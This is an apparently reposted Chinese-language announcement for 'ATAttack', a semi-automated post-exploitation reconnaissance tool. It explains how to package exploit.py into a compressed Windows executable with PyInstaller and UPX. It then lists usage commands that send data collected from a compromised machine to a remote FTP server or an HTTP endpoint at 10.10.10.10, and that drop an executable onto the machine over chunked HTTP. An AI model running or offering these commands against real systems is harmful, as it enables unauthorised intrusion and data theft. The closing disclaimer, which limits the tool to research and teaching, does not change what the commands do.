0x01 前言
每获取一台机器权限,如果每次都手动操作重复一样的信息收集工作,无疑加大了工作量,既为了能更好的获取内网进一步突破点攻击面,这段闲暇时间造了个简易的轮子,其在真实环境中发现较多未知问题,欢迎大家踊跃提交 issue 和 PR !
0x02 简介
0x03 打包ATAttack二进制文件
Python 2.7.15
PyInstaller 3.4
Windows 10
下载UPX(测试环境为upx-3.95-win64版本)
https://github.com/upx/upx/releases
pip安装pyinstaller
pip install pyinstaller
进入ATAttack目录,并通过upx压缩
pyinstaller -F exploit.py --upx-dir=upx-3.95-win64
成功打包二进制控制台单文件ATAttackdist]exploit.exe
0x04 快照预览
Win10测试环境
0x05 使用方法
存储于本地临时文件夹:
python exploit.py
回传远程FTP服务器:
python exploit.py -t ftp_host -u ftp_user -p ftp_pwd
通过PUT请求回传http服务端
python exploit.py -d http://10.10.10.10:8000/
HTTP分块传输落地可执行文件
python http_client.py -d http://10.10.10.10./exploit.exe -u http://10.10.10.10:8000/
0x06 获取方式
https://github.com/c1y2m3/ATAttack
原文始发于微信公众号(渗透Xiao白帽):【神兵利器】后渗透半自动化侦察Tools(附下载)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论